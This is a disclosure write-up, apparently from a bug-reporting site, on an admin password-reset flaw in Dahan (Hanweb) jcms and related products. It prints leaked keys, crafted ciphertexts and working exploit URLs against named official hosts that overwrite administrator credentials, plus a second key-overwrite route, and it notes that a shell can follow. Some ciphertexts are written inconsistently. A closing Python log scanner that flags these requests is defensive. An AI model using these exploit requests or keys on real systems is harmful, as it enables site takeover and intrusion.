Dahan (Hanweb) network: administrator password reset vulnerability affecting every version (verified on two official websites)
The whole product line is affected: jcms, jact, jsearch, vipchat, vc and xxgk.
Step 1: Dahan encryption and decryption
The LDAP key is stored in the configuration file /interface/ldap/ldapconf.xml.
Key obtained: O3h2iB8ggnp2
With the Dahan encryption/decryption library we can encrypt and decrypt arbitrary values; once the server key is known, we can talk to the server as if we were a trusted peer system:
Step 2: The ldapconf.xml file that holds the key is placed inside the web root, so it can be requested directly:
(Many such keys are found easily.)
Test against the official website:
Request: http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml
Key obtained: OJ9Un5JmpTfN0gJx
Step 3: Use the key OJ9Un5JmpTfN0gJx to construct the following ciphertexts:
    encrypt: e2V1Z3UdA2sNaw==  ->  decrypt: admin
    encrypt: DEIBRXBGcUQOM3g0  ->  decrypt: 123456
Step 4: Overwrite the administrator credentials with admin / 123456.
Vulnerability EXP:
http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=e2v1z3uda2snw=&loginpass=deibrxbgcuqom1_0
Log in directly; the request redirects straight into the admin backend. Getting a shell from the backend is already widely documented:
Vulnerability Analysis:
Component function: /interface/ldap/receive.jsp is a shared component used to synchronise users between the different Dahan systems. For example, a jact system uses it to synchronise jcms users into its own database. The component creates a user, and if that user already exists, it updates the record instead. That is how the administrator's password gets reset. Parameters: loginuser=e2v1z3uda2snw= and loginpass=deibrxbgcuqom1_0 are the encrypted admin / 123456, which overwrite the administrator password.
Source code analysis:
    # /interface/ldap/receive.jsp
    // read the parameters
    String loginuser = Convert.getParameter(request, "loginuser", "", true, true); // username
    String loginpass = Convert.getParameter(request, "loginpass", "", true, true); // password
    // build the user object
    Merp_Pub_UserEntity entity = new Merp_Pub_UserEntity();
    entity.setVc_loginid(loginuser);
    entity.setVc_password(loginpass);
    // check whether the user is valid
    ldapBlf.checkValidate(entity);

    # decompiled jcms.blf.user.ldapBLF.java
    // decrypt the passed parameters
    vc_loginid = decrypt(vc_loginid, this.encrypttype);
    vc_pwd = decrypt(vc_pwd, this.encrypttype);
    // insert or update the database record with the decrypted user information
    insertOrUpdateUser(ldapEn, groupid, 0);
New angle:
The password-reset vulnerability reported earlier was caused by leakage of the LDAP key:
/interface/ldap/ldapconf.xml sits inside the web root and can be requested directly.
In my test of the latest official demo, /interface/ldap/ldapconf.xml is no longer accessible.
Without the plaintext key, the administrator password cannot be reset that way.
Demo: http://demo.hanweb.com/jcms/
So I analysed the component /interface/ldap/receive.jsp further and found a pleasant surprise:
    if (state.equals("S")) { // register the application
        boolean b = ldapBlf.writeXML(appname, enckey, ldapurl, webtype, ssourl, encrypttype);
    }
The original XML configuration file can be overwritten, so the EXP is constructed as:
http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=S&enckey=key888
Construct the ciphertext with the new key:
    enckey: key888
    encrypt: BWcCb3FrBBh8bQ=  ->  decrypt: admin
Overwrite the administrator credentials with admin / admin.
Vulnerability EXP:
http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=BWcCb3FrBBh8bQ==&loginpass=BWcCb3FrBBh8bQ=
Once again, the login succeeds:
Impact scope:
Through the two angles above, both the old and the new versions of the entire product line are affected: jcms, jact, jsearch, vipchat, vc, xxgk and so on.
Thousands more sites like those listed above could easily be added.
! Requesting featured status !
Key, LDAP, encryption and decryption, programming, case study, affects all versions, two angles, two official-website verifications, source-code analysis, vulnerability analysis!
Solution:
Fix the design-logic flaw.
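Both request patterns described above leave a clear trace in the web server access log, so a defender can detect them even before a vendor fix lands. The following scanner is an added example (not part of the original write-up or of the Dahan product): it flags reads of ldapconf.xml, state=S config overwrites and state=C user syncs from hosts outside an allowlist. The log lines are constructed, and TRUSTED_SYNC_PEERS is an assumed allowlist of the peer systems (jact, jsearch, ...) that legitimately call the interface.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Peer systems (jact, jsearch, ...) that legitimately call the sync interface.
# Assumption for this example; set it per deployment.
TRUSTED_SYNC_PEERS = {"10.0.0.20"}

# Combined/common log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify(line):
    """Return a finding for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    # parse_qs splits each pair at the first '=', so base64 padding in values survives
    params = {k.lower(): v[0] for k, v in parse_qs(url.query).items()}
    if path.endswith("/interface/ldap/ldapconf.xml"):
        # The key file should never be served; even a 404 shows someone probing for it
        return f"{client}: ldapconf.xml key file requested (HTTP {status})"
    if path.endswith("/interface/ldap/receive.jsp"):
        state = params.get("state", "").upper()
        if state == "S":
            # state=S rewrites ldapconf.xml, including enckey, with no authentication
            return f"{client}: enckey overwrite via state=S"
        if state == "C" and client not in TRUSTED_SYNC_PEERS:
            # state=C reaches insertOrUpdateUser; only known peers should send it
            return f"{client}: user sync (state=C) from untrusted host"
    return None


def scan(lines):
    """Run classify over a whole log and keep the findings, in order."""
    return [f for f in map(classify, lines) if f]


# Constructed sample log (not captured from any real system); ciphertexts are dummies.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2014:13:55:36 +0800] "GET /jcms/interface/ldap/ldapconf.xml HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2014:13:56:02 +0800] "GET /jcms/interface/ldap/receive.jsp?state=S&enckey=XXXX HTTP/1.1" 200 40',
    '203.0.113.5 - - [10/Oct/2014:13:56:40 +0800] "GET /jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=AAAA==&loginpass=BBBB= HTTP/1.1" 200 88',
    '10.0.0.20 - - [10/Oct/2014:14:00:00 +0800] "GET /jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=CCCC==&loginpass=DDDD= HTTP/1.1" 200 88',
    '198.51.100.9 - - [10/Oct/2014:14:01:13 +0800] "GET /jcms/index.jsp HTTP/1.1" 200 3072',
]
```

Running scan(SAMPLE_LOG) yields three findings: the key-file read, the state=S overwrite and the state=C sync from 203.0.113.5; the sync from the allowlisted peer and the ordinary page view are not reported.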